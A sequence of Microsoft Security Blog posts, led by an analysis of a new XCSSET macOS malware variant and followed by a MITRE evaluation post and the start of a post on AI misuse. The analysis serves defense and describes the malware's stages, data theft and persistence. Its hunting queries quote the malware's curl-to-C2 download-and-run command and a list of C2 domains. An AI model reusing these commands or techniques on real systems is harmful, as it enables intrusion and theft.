XCSSET is known for infecting Xcode projects and runs while an Xcode project is being built. Since Xcode is typically used by software developers, we assess that the malware’s mode of infection and propagation leverages on the idea that project files are shared among developers building Apple or macOS-related applications.

While it has resemblances to older XCSSET variants, this new variant is characterized by its modular approach and encoded payloads. It also has improved error handling, and heavily uses scripting languages, UNIX commands, and legitimate binaries. These characteristics allow the malware to have a low profile on an affected device and even remain fileless whenever possible, thus making its detection and removal more challenging.

At the code level, the new XCSSET variant obfuscated its module names, making it difficult to determine the modules’ intent during static analysis. Its enhanced obfuscation techniques extend to its randomized approach for generating payloads to infect Xcode projects and for encoding its payloads. In addition, while older XCSSET variants only used xxd (hexdump) for encoding, the latest one also incorporates Base64. Other notable capabilities of this new variant include its three distinct persistence techniques, which ensure its payload launches whenever a new shell session is initiated or whenever a user is tricked into opening a fake Launchpad application or makes commits in Git, and a new infection method for where the malware places its payload in a target Xcode project. Our analysis also revealed that there are some modules in this new variant’s code that appear to be under development. Its command-and-control (C2) server is also active as of this writing and is downloading additional modules.

In this blog, we discuss how this variant’s different modules work together in achieving the malware’s goals. As part of Microsoft’s commitment to work with the security community to mitigate threats and improve security for all, we have shared these findings with Apple, who acknowledged and thanked us for the information. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re sharing our comprehensive analysis and providing best practices and recommendations more broadly so users and organizations can protect themselves against this threat.

Analyzing the latest XCSSET variant

The new XCSSET variant generally follows a four-stage infection chain, with the fourth-stage payload running various sub-routines. The following sections provide detailed descriptions of each of these modules.

First stage: Xcode shell payload

The payload referenced in this stage gets launched when a user unknowingly builds an infected Xcode project. This obfuscated payload passes through three iterations of a hex decoder and is then piped—or served as input—to shell.

The decoded payload simply makes a curl request to a C2 server, https[:]//bulknames[.]ru/a. The response it receives is then piped to shell.

Second stage: Obfuscated shell command

This payload, which was downloaded by the first-stage shell, collects the affected user’s device operating system information, which it then sends to the C2 server along with a default identifier/tag to download an additional payload. It then pipes the downloaded payload to the shell for execution.

Third stage: Downloaded shell payload

This stage again involves a shell script that first checks if the device’s version of XProtect, the built-in antivirus in macOS, is less than 5287. This check is done by running the command “xprotect version” and reading the Info.plist file of the XProtect bundle.

The script then checks and stops any of the referenced processes in Figure 3 and any running osascript processes. It then calculates the date and searches for a hidden file named .a in the home folder. If it finds the file, it updates the said file; otherwise, it creates a new file with the date and other counters/markers.

The script then deletes any existing references to /tmp/l.app and creates a new one. It then downloads another script from the C2 server and saves it at the location /tmp/b. Next, it creates an AppleScript compiled application using osacompile. This AppleScript payload launches the downloaded /tmp/b script.

The script then uses the plutil command to modify the Info.plist file of the created AppleScript application to enable the LSUIElement key. Enabling this key hides the application from the Dock, effectively making the application more of a background process. Finally, the script runs the application in the background, sleeps for 10 seconds, and removes the created application and the /tmp/b script.

Fourth stage: AppleScript payload (/tmp/b or looz)

The fourth stage involves the execution of the created AppleScript application, which essentially runs a shell command. This command passes a Base64-encoded blob through several iterations of a Base64 decoder to obtain the final script, which is subsequently executed.

The decoded script is another AppleScript that first parses the com.apple.launchservices.secure.plist file to determine the default browser for https URLs. It searches for the “https” URL scheme and extracts the corresponding browser’s bundle identifier. The script has explicitly set the variable to “Safari (com.apple.safari)” by default.

The script then fetches the following system information, which it sends to the C2 server as a single string:

• macOS version
• Safari version
• User locale
• Firewall status
• System Integrity Protection (SIP) status
• CPU information

The script also overrides the default log() function so that it can send logs to the C2 server—a capability that can also be seen across the various sub-modules the script launches. The next section provides more information about the sub-modules the script downloads from the C2 server as of this writing.  

The script then checks if the user name is “demo,” possibly to verify if the user account belongs to the threat actor. If the user name checks out, the script processes a specific module, cozfi_xhh, and returns. It also checks the device serial number and exits if the value contains “JV3Q” in it. Next, it calls the boot() function repeatedly with multiple obfuscated module names.

The boot() function has multiple filters with predefined logic and handlers for the module names passed in the argument. In case the module name doesn’t pass any filter, a code in the boot() function downloads an AppleScript that is then launched directly to avoid any artifacts on the disk. Depending on the wait flag passed to this function, the newly downloaded AppleScript is run in either background or foreground.

Sub-modules

The sub-modules that the fourth-stage script downloads follow the similar format where a Base64-encoded blob is passed through multiple iterations of a Base64 decoder before being launched directly.

seizecj (Steals system information)

This sub-module exfiltrates system information to the C2 server. The information it retrieves includes:

• Applications list
• System applications list
• User level LaunchAgents list
• XProtect version
• Malware Removal Tool (MRT) version

fpzfcieoci (Lists browser extensions)

This sub-module searches for and lists down the various internet browser extensions it finds installed on the affected device. It has a predefined list of search strings that correspond to the folder paths and files of the browsers that it searches for:

This sub-module processes each path individually to search for specific files and extracts metadata about the browser extensions. For example, for Firefox, it extracts lines containing “extensions.webextensions.ExtensionStorageIDB” from the file prefs.js file. For the other browsers, it searches the manifest.json file and extracts the lines containing either “default_title” or “name”. It then stores the extension list in a log file named /tmp/out.txt and uploads this file to the C2 server.

hxasoxtfd (Downloads an additional module)

This sub-module is a downloader that requests a module name from the C2 server every 120 seconds.

If a module name is received from the C2 server, the system proceeds to call the boot() function with the received module name. This function includes filters on the module name, similar to those observed in the parent (fourth-stage) payload. In case the filters don’t pass, this sub-module proceeds to download and launch directly the payload received from the C2, again to avoid any artifacts on the disk.

txzx_vostfdi (Steals digital wallet data from browsers)

This sub-module first sends a request to retrieve a path list from the C2 server. The following screenshot is an example of a path list received from the C2:

Based on the specified paths, this sub-module appears to search for many cryptocurrency digital wallet extensions across various browsers and their directories. This information is primarily determined by examining the identifiers, such as the following:

This sub-module archives the collected data, which it then sends back to the C2 server.

hfdieiz (Establishes persistence)

This sub-module establishes persistence through two different methods, zshrc and Dock, which will be discussed in the following sections. It first creates a folder named com.apple.finder in the ~/Library/Caches/ directory.

This sub-module generates payload by randomly selecting a C2 server from a predefined list and selecting an encoding method, which is either Base64 or xxd. It then chooses the number of iterations required to encode or decode the payload. The final encoded payload is then generated and returned. The argument received in the function is placed as a marker at “p=” in the payload request.

zshrc method

In this persistence method, the sub-module first checks the value of the RESTORE_DEFAULT global variable. If the value is set to “True”, the sub-module deletes the ~/.zshrc_aliases file; otherwise, it retrieves the payload body and saves it to the ~/.zshrc_aliases file. The subsequent payload involves verifying the existence of the .zshrc_aliases file and executing it if it is present. The script then ensures that the ~/.zshrc file exists. It searches for the presence of the string “.zshrc_aliases” within this file and appends the final payload if it is absent. This persistence method guarantees the execution of the payload whenever a new shell session is created.

Dock method

In this persistence method, the sub-module first downloads a signed dockutil tool from the C2 server. This tool is mainly used to manage dock items, such as adding, deleting, and updating entries. The sub-module then gets the list of dock items and searches for Launchpad in it. If it finds an entry, it proceeds to call the processItem function, which then creates a fake Launchpad application in the ~/Library/Caches/com.apple.finder folder.

The processItem function proceeds to get the corresponding payload application body from getPayloadForApp() function, which then initially verifies whether the passed application name is “Launchpad.” If it is, then the payload body for Launchpad is retrieved using the getPayloadBody() function.

In the getPayloadForApp() function, the final payload is configured to first invoke the legitimate Launchpad application and then launch the generated malicious payload. The final payload body is then returned to the processItem function.

The processItem function also has a logic to update the persisted payload in case it is already found on the device. If the device has no prior infection, the function first compiles an AppleScript payload to an application with the “run-only” flag. This flag could make it challenging to reverse engineer the code and evade static analysis. The function then saves the payload to a file in the parent directory. Next, it checks if the application name is “Launchpad” and, if it is, modifies the Info.plist file’s entries to enable the LSUIElement key and update CDBundleDisplayName. It then downloads InfoPlist.locatable and Launchpad’s icon from the C2 server, replaces the created application’s icon with it, and performs an ad-hoc signing on the application.

Finally, the processItem function uses the dockutil binary to replace the existing Launchpad entry with the fake Launchpad’s application path. It does this by replacing the file URI entry of the legitimate Launchpad application with the fake one. These steps ensure that every time the user starts Launchpad from the dock, the malicious created application is launched, which then runs both the legitimate Launchpad and the generated payload.

cozfi_xhh (Steals notes from the Notes application )

This sub-module steals notes from the affected device’s Notes application through a JavaScript payload.

It initializes a variable named permissionApp to path to /Applications/Reminders.app, where the fake Reminders application is created, and to /Applications/Reminders.app/Notes/, where the stolen notes are saved. It is important to note that the legitimate Reminders application can be found in the /System/Applications directory. The sub-module then removes the Notes folder if it exists inside the fake Reminders application. It also checks for the presence of the fake Reminders application on the device and creates one if it’s not present.

This sub-module creates an AppleScript-compiled application with the flag set to “Run only.” This application’s script launches the /tmp/.n file using osascript. The sub-module then downloads an icon file from the C2 server. Next, it modifies the Info.plist file by updating the CFBundleDisplayName and CFBundleExecutable and enabling the LSUIElement key. Finally, it performs an ad-hoc signing for this newly created application.

After the creation of the application, the sub-module checks the global variable FORCED flag, which is set to “False” by default in the script. If the FORCED flag is set to “True”, the sub-module calls the exec function directly. Otherwise, it first sends a request to the C2 server to obtain a folder list. The code expects to receive “notes_app” in the response. If this application is present, it enters a loop, waiting for the Notes application to start before calling the exec function. The exec function then subsequently calls the runloop function.

The runloop function first sets the payload, which is basically a JavaScript code. Meanwhile, the run() function of the JavaScript payload first checks and connects to the Notes application present in the Systems directory, retrieves all notes, and saves each note’s contents, creation date, and modification date into an HTML file in the Notes folder within the Reminders application created previously.

The sub-module saves the JavaScript payload into the /tmp/.n file. It then launches the Reminders application to run the said payload. It checks for the existence of Notes folder and, if absent, retries up to three times by resetting the Transparency, Consent, and Control (TCC) database for AppleEvents before deleting the created Reminders application. If the Notes folder exists, it returns a “200” code. When the sub-module’s parent function receives the said “200” code, it archives the Notes folder within the created fake Reminders application and exfiltrates it to the C2 server.

Modules listed under finderModules list in boot() function

In the boot() function of the fourth-stage AppleScript module, there is a specific handler code for certain modules found under the finderModules list.

Figure 17 shows how the fourth-stage payload downloads the module passed to the boot() function into the /tmp/.f file. It then calls the boot() function again with a specific module named vectfd_xhh.

Let’s first look at the common module invoked for each of the other modules on the list.

vectfd_xhh (Launches application for modules)

In this module, the doMain() function checks the existence of either Xcode or Git. If either application is found, several global variables are set with a certain application’s display name, file path, and icon name.

If neither application is present, the module defaults to Finder.app. Subsequently, the doInstall() function is called for each case. It should be noted that the legitimate Finder and Terminal applications are located in the /System/Applications/ folder and not in /Applications/.

In the doInstall() function, the existence and version of the fake application in context is first checked. If the fake application isn’t present or is outdated:

• If the current process in context is Xcode or Finder, the module waits for the corresponding legitimate application to launch first before calling the createLoop() function
• If the current process in context is Terminal, the module directly calls the createLoop() function

The createLoop() function deletes any prior existence of the application before creating the fake one. The created application is AppleScript-compiled with the flag set to “Run only,” and it executes a script located at /tmp/.i. Similar to the previous fake application-creating modules, the created application’s icon and plist entries are modified, and is ad-hoc signed.

The module then calls the runAppFile() function. This function first sets a payload where it attempts to get a listing of the user’s directories, possibly to check TCC permissions. If the command succeeds, this function deletes any existing error file (/tmp/.e); otherwise, it creates the file. The payload then launches the /tmp/.f file that was downloaded in the parent (fourth-stage) module.

Next, the runAppFile() function saves the payload it set initially in the /tmp/.i file and launches the created application. This created application in turn launches the /tmp/.i file, which, in turn, also executes the /tmp/.f file.

If the directory listing command isn’t successful, the error file is created. If this error file exists, the function returns code “403”. If the parent function receives this code, it retrieves the CFBundleIdentifier of the created application, resets the TCC database for that bundle ID, and calls the createLoop() function again.

dfhsebxzod (Infects Xcode projects)

This module, which is launched by the launcher module vectfd_xhh, is designed to infect Xcode projects located on the target device. It initially retrieves the user’s home directory and subsequently invokes two distinct functions to search and process files.

The first function searches for xcodeproj directories, excluding certain specified directories. The other function downloads a binary, presumed to be a 7-Zip binary, from the C2 server. It then searches the HOME folder, excluding specified directories, for .zip files. When it finds these .zip files, it scans the archive listing for “xcodeproj.” If it finds this entry, the module contains a logic to extract the project files, modify them, and update the archive with the modified files.

For both functions, each directory or file match triggers a subsequent function that searches for a .pbxproj file within the given directory. This new function then randomly selects one of three infection methods: RULE, TARGET, or FORCED_STRATEGY. The infection method determines how the payload will be placed and referenced in the .pbxproj file.

An example infection method that wasn’t mentioned in previously published research is part of FORCED_STRATEGY method. This method includes the use of TARGET_DEVICE_FAMILY variable under Build Settings, which contains the generated payload.

Next, it adds a PBXShellScriptBuildPhase in the .pbxproj file where the payload will be present in the shellScript key.

The payload generation was done in a separate function where it first defines three specific domains and randomly selects one from them. It uses either the xxd or Base64 encoding method, also chosen at random.

This method also selects a random value between 2 and 5 to determine the number of iterations for encoding/decoding. The first payload includes an encoded curl request to the specified C2 server, the output of which is piped to the shell for execution. The final payload, which consists of the above encoded data and a decoding string, is also piped to shell for execution.

jez (Establishes persistence through Git commits)

This module attempts to establish persistence by incorporating its payload into the pre-commit hooks within the .git directory of projects located on the device.

It searches for .git folders the in the user’s home directory and sub-directories using the find command. It searches up to six levels of sub-directories and excludes those named Movies, Library, Music, and Pictures. For each .git directory found, this module checks for the presence of the hooks/pre-commit file within those directories. If it finds the file, it removes any existing payload content and appends the newly created payload.

If the module doesn’t find the pre-commit file, it creates the file and writes the payload within it. The process for generating the payload is similar to the zshrc and Dock persistence techniques discussed in the previous sections of this blog. This persistence method ensures the execution of the payload upon each commit action in the project.

File/Data exfiltration modules assessed to be in development

uhsoxtfd_vostfd (Directory uploader)

This module is designed to exfiltrate files from a specified target folder. It appears to be in the development phase as of this writing because the specified target folder is currently set to ~/Desktop/test.

This module first verifies the existence of the target folder and exits if it can’t find the said folder. Otherwise, it lists the folder’s contents to test access permissions. If access is denied, the module runs a recursive loop to reset the TCC database for directories such as Desktop, Downloads, and Documents.

Once folder access is granted, the module archives the folder, excluding certain files such as links, patterns listed in the exclusion list, and files exceeding a specified size. It then uploads the created archive to a C2 server. Once the exfiltration is complete, the module deletes the archive.

fpfb (Directory listing)

This module runs a predefined command and uploads the result of the said command back to the C2 server. Currently, the command is set to “ls -la ~/Desktop”, which lists the files and directories in the user’s Desktop folder.

vectfd (Specific files exfiltration)

This module retrieves files that match the pattern defined in the INAME_QUERY variable within the user’s home directory. Currently, it searches for files with the pattern “*test.txt,” which indicates that the module might be under development. It also excludes files located in certain directories and files that exceed its size restrictions. The module then creates an archive of the files it retrieves, sends the archive to a C2 server, and deletes the archive.

Mitigation and protection guidance

Defenders can take the following mitigation steps to defend against this threat:

• Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
• Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
• Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
• Use Microsoft Defender for Endpoint on Mac, which detects, stops, and quarantines the malware discussed in this blog

Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:

• Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
• Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
• Turn on network protection to block connections to malicious domains and IP addresses.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

• Trojan:MacOS/XCSSET.SC
• Trojan:MacOS/XCSSET.SE
• Trojan:MacOS/XCSSET.ST

Defender Antivirus detects multiple sub-modules of this threat as the following:

• Trojan:MacOS/XCCSET.SE
• Trojan:MacOS/XCCSET.SF
• Trojan:MacOS/XCCSET.SG
• Trojan:MacOS/XCCSET.SI
• Trojan:MacOS/XCCSET.SJ

Defender Antivirus also detects the following specific modules of this threat:

• Trojan:MacOS/XCCSET.SK – dfhsebxzod
• Trojan:MacOS/XCCSET.SH – fpzfcieoci
• Trojan:MacOS/XCCSET.SD – hfdieiz

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

• Possible XCSSET activity

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

• Suspicious script launched
• System information discovery
• Network connection by osascript
• Possible content exfiltration
• Suspicious file or content ingress

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Suspicious commands while building an Xcode project

Search for suspicious commands related to this threat when an Xcode project is being built.

DeviceProcessEvents 
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh")
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh") 
| where InitiatingProcessCommandLine contains "/Developer/Xcode/DerivedData"

Suspicious payload patterns

Search for suspicious payload patterns related to this threat.

DeviceProcessEvents 
| where ProcessCommandLine has_all("echo", "xxd -p -r", "| sh") or ProcessCommandLine has_all("echo", "base64 -d", "| sh") 
| where InitiatingProcessFileName has_any ("sh", "bash", "zsh")

Microsoft Sentinel 

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

Search for command lines making first contact to C2 server or for command lines stopping Xcode, Terminal, or Finder applications:

union DeviceFileEvents, DeviceProcessEvents
  | where Timestamp >= ago(90d)
  | where ProcessCommandLine contains 'curl -fskL -d "https://bulknames.ru/a" | sh >/dev/null 2>&1 &'
  or ProcessCommandLine has "ps aux | grep -E '/Applications/(SimulatorTrampoline|Terminal|Finder).app' | grep -v grep | awk '{print $2}' | xargs kill -9 &/dev/null || true"

Check for communications with network indicators of compromise (IOCs):

let c2cdomains = dynamic(["bulknames.ru","castlenet.ru","chaoping.ru","devapple.ru",
"gigacells.ru","gizmodoc.ru","trixmate.ru","itoyads.ru","rigglejoy.ru","rutornet.ru",
"sigmate.ru","vivatads.ru","figmasol.ru"]);
DeviceNetworkEvents
| where RemoteUrl in (c2cdomains)
| project TimeGenerated, DeviceId, DeviceName, Protocol, LocalIP, LocalIPType, LocalPort,RemoteIP, RemoteIPType, RemotePort, RemoteUrl

Check for infected file or script IOCs:

let selectedTimestamp = datetime(2025-01-01T00:00:00.0000000Z); 
let FileSHA256 = dynamic(["d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f","56670f51f94080f1ae45f2a433767f210f290835bf582e1a2e1876f1028832de",” f67e2a27f0d1a4667b065ab05f884ff881eb7627e9d458f97f2204647b339c6e”
"","25d226d5cb0c74ed5b1b85f12d53a4c2de2147ff464b2a35db03987015b11e24",
"c2a7970216576a6b8f74528ffcfa51aa2b72b7f3e4237d97715b1b5ba80b25ca","8cec3c106659709017bb253becf68296c7bf13e76fa92b4450c281003d225645",
"ea90c72e67f1c9a9231732119576a7dcb29471f7da428866187d4326e78097f2","ff83f53a383ba3f1d6b002006adf16a7f0b3263185d56cb70104889874d67c5d","cc37a01d3351b3c166f04aec6f52849e909b0b9c8d55095d730c660691b1ba66"]); 
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, 
DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator) 
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from January 1st runs the search for 90 days, change the selectedTimestamp above or 90d accordingly. 
and  
(SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))

Indicators of compromise

MITRE ATT&CK techniques observed

References

• https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware–infects-xcode-projects–uses-0-days.html
• https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf
• https://www.intego.com/mac-security-blog/mac-malware-exposed-xcsset-an-advanced-new-threat/
• https://www.jamf.com/blog/osx-xcsset-subverts-developer-environments/
• https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects appeared first on Microsoft Security Blog.

For the sixth year in a row, Microsoft Defender XDR demonstrated industry-leading extended detection and response (XDR) capabilities in the independent MITRE ATT&CK® Evaluations: Enterprise. The cyberattack used during the detection test highlights the importance of a unified XDR platform and showcases Defender XDR as a leading solution for securing your multi-operating system estate, with the following results:

• Achieved industry-leading, cross-platform detection: 100% technique level detections across all attack stages for Linux and macOS threats leveraging our new extended Berkeley Packet Filter (eBPF) Linux sensor and macOS behavioral monitoring engine that delivers rich actionable content.
• Delivered zero false positives, providing powerful security without overwhelming the security operations center (SOC). Defender XDR accurately alerted on and blocked only malicious activity every time so the SOC can focus their limited time and resources on responding to real cyberthreats at hand. Key to this result are critical cross-platform capabilities like remote encryption detection for gaining deeper visibility into the cyberattacker’s machines and behavior monitoring for detecting emerging threats on macOS.
• Equips the SOC with powerful technology like Microsoft Security Copilot, the industry’s first generative AI for security, to thwart attacks with contextual insight and speed with capabilities like script analysis that translates obfuscated PowerShell scripts into intuitive explanations of a script’s role in the cyberattack.
• Deep visibility into remote encryption, providing unprecedented visibility into encryption attempts originating from remote machines that might not even be onboarded to Defender XDR and putting an end to an advanced cyberattack vector being used in over 70% of recent ransomware cases.¹

Microsoft Defender XDR

Supercharge your SecOps effectiveness with XDR.

Learn more

Defender XDR is the industry’s broadest natively integrated XDR platform spanning endpoints, hybrid identities, email, collaboration tools, software as a service (SaaS) apps, and data with centralized visibility, powerful analytics, and automatic attack disruption, a powerful response capability unique to Microsoft. 

 A note on this year’s emulation: It is Microsoft’s opinion that the Protection test does not mirror realistic cyberthreats that organizations face. The Protection test methodology differed significantly from the Detection test that emulated an end-to-end attack scenario reflective of the cyberthreat landscape.  See our statement below. 

Customer reality is core to Microsoft’s testing approach

Microsoft Security’s mission is to build a safer world while enabling all organizations, users, and services to be as productive as possible. On the ground this means equipping security analysts with a holistic, actionable view of the cyberthreat landscape to minimize time to remediate legitimate bad actors.

As we develop our product, we strive to find the right balance between providing industry-leading security while ensuring under-sourced security operations teams are not flooded with false positives. We hold ourselves accountable for delivering on this goal by regularly participating in product evaluations to identify gaps and improve our products. This year, our conclusion from the MITRE protection test is that it was designed to evade protection mechanisms to the extent that it is unrepresentative of an actual cyberattack, a methodology that Microsoft disagrees with.

The core issue is the micro-testing methodology, which is inconsistent with how cyberattackers typically operate, moving laterally within organizations by gaining access to identities and privileges over time. These broader signals are critical for distinguishing between benign and malicious activities so we can balance protecting organizations from cyberattacks while supporting the broadest set of benign use cases across a massive customer base worldwide.

For example, MITRE used “micro emulations” starting with a highly privileged user and applications signed by a trusted certificate  to conduct cyberattack steps in isolation without adequate context. Signed apps executed by privileged users is a benign scenario we see on thousands of Windows machines a day. Using a trusted certificate isn’t suspicious unless the associated user was compromised—context that the MITRE test lacked. Nor were there signals provided to enable us to determine that the certificate in the trusted root authority had been compromised or was seen to be signing malicious applications.

Microsoft will not implement the test’s recommendations as they do not reflect cyberattack patterns on customer environments. Doing so would cause outages for legitimate customer scenarios.

We appreciate the ongoing collaborative dialogue with MITRE on the topic of testing methodology and look forward to our continued partnership into the future.

How Microsoft fended off adversaries in the Detection test

In previous evaluations, MITRE scoped emulated behaviors to a specific cyberthreat actor group, like Secret Blizzard. This year, MITRE has added ransomware as an attack category informing a range of malicious behaviors carried out against Windows and Linux. For the macOS portion of the emulation, MITRE applied adversarial behaviors inspired by cyberthreat actors that the Democratic People’s Republic of North Korea (DPRK) sponsors. Microsoft Threat Intelligence tracks these groups at a granular level, for example, Sapphire Sleet, Ruby Sleet, Moonstone Sleet, and others that commonly escalate privileges and target user credentials on macOS.

Let’s take a closer look at how Microsoft Defender XDR once again achieved industry-leading results in this year’s MITRE evaluation and how Microsoft is shaping the future of security to respond to the most prevalent cyberthreats like ransomware.

A leader in detection for every cyberattack stage: 100% technique level detections for Linux and macOS cyberthreats

Organizations often have diverse digital estates spanning multiple operating systems, which is why Microsoft invests heavily in ensuring detection for all major operating systems is both accurate and actionable. Microsoft’s industry-leading cross-platform results are driven by a combination of continuous investments, such as:

1. Extending our generative AI solution, Security Copilot, beyond Windows.

Security Copilot is the only security AI product that combines a specialized language model with security-specific capabilities from Microsoft. These capabilities incorporate a growing set of security-specific skills informed by our unique global threat intelligence and more than 78 trillion daily signals. Summarizing incidents, guiding response actions, using natural language for advanced threat hunting, and analyzing obfuscated PowerShell scripts are just some of the ways Security Copilot helps analysts accelerate workflows and gain new skills. In this evaluation, script analysis played a key role for macOS where we see human-readable explanations alongside the code as well as MITRE Tactics, Techniques, and Procedures (TTPs). This way analysts can quickly understand how the adversary is using the file or script.

2. Delivering enhanced behavioral monitoring capabilities to detect emerging cyberthreats even earlier on macOS.

Effective security is about the quality and actionability of detections, not just the quantity. These principles guide how we’ve built industry-leading security across Windows, Linux, and macOS. Let’s look at step Mac 4.08 Credentials from Password Stores: Keychain by a suspicious file as an example. Keychain-related file access happens often on macOS, even when a machine is idle. On average, these files may be accessed well over 400 times per hour. This level of activity is normal for many popular applications, such as OneDrive, Adobe Creative Cloud, and the built-in macOS apps. However, sorting out normal versus suspicious access poses a significant challenge for many vendors. We gain this deeper analysis through a combination of advanced behavior monitoring and content scanning, along with Microsoft’s exclusive threat intelligence. This approach helps pinpoint genuinely suspicious access, like those from us.zoom.ZoomHelperTool, providing analysts with the precise data they need to respond effectively.

Zero false positives across Linux, macOS, and Windows

When benign activities are flagged as malicious, security analysts end up wasting time and resources investigating. At a scale of potentially hundreds to thousands of alerts a day, false positives quickly lead to team burnout and eroded trust in security measures. This year, MITRE introduced a false positive metric by weaving in innocuous actions like legitimate file-sharing in the cyberattack steps to see if evaluated solutions would generate unnecessary alerts. Microsoft employs machine learning-based detections, only alerting on anomalous activity that seems to originate from malicious intent. This approach is how we deliver powerful security without overwhelming the SOC.

Microsoft’s dedication to protection with minimal false positives is evident in regularly occurring, public antivirus assessments conducted by endpoint testing authorities like AV-Comparatives, AV-Test, and SE Labs.

Deep visibility into remote encryption attempts 

Since 2022, Microsoft has observed a spike in cyberattackers using remote encryption, where a cyberattacker uses a compromised device to encrypt other devices in a given network. As the latest Microsoft Digital Defense Report points out, 70% percent of successful human-operated ransomware cyberattacks have applied this technique. Gaining insight into a cyberattacker’s machine is typically a blind spot for many antivirus and endpoint detection and response solutions. Defender XDR, however, provides analysts with this critical visibility so that even if an unmanaged device is compromised, it can protect your hybrid organization from advanced cyberattacks like ransomware.

Empowering defenders with the security they need

As the cyberthreat landscape rapidly evolves, Microsoft is committed to empowering defenders with industry-leading, cross-platform XDR. Our evaluation philosophy is to reflect the real world by configuring the product as customers would in line with industry best practices. In the MITRE Evaluations, as with all simulations, Microsoft Defender XDR achieved industry-leading results without manual processing or fine-tuning and can be run in customer environments without generating an untenable number of false positives. Microsoft’s commitment to delivering cybersecurity while minimizing false positives is reflected in regularly occurring public evaluations.   

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation. 

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

¹Microsoft Digital Defense Report 2024

The post Microsoft Defender XDR demonstrates 100% detection coverage across all cyberattack stages in the 2024 MITRE ATT&CK® Evaluations: Enterprise​​ appeared first on Microsoft Security Blog.

The objective of Microsoft’s partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including Microsoft Copilot for Security, to elevate defenders everywhere.

A principled approach to detecting and blocking threat actors

The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House’s Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order’s request for comprehensive AI safety and security standards.

In line with Microsoft’s leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft’s policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track.

These principles include:   

• Identification and action against malicious threat actors’ use: Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources.           

• Notification to other AI service providers: When we detect a threat actor’s use of another service provider’s AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies.

• Collaboration with other stakeholders: Microsoft will collaborate with other stakeholders to regularly exchange information about detected threat actors’ use of AI. This collaboration aims to promote collective, consistent, and effective responses to ecosystem-wide risks.

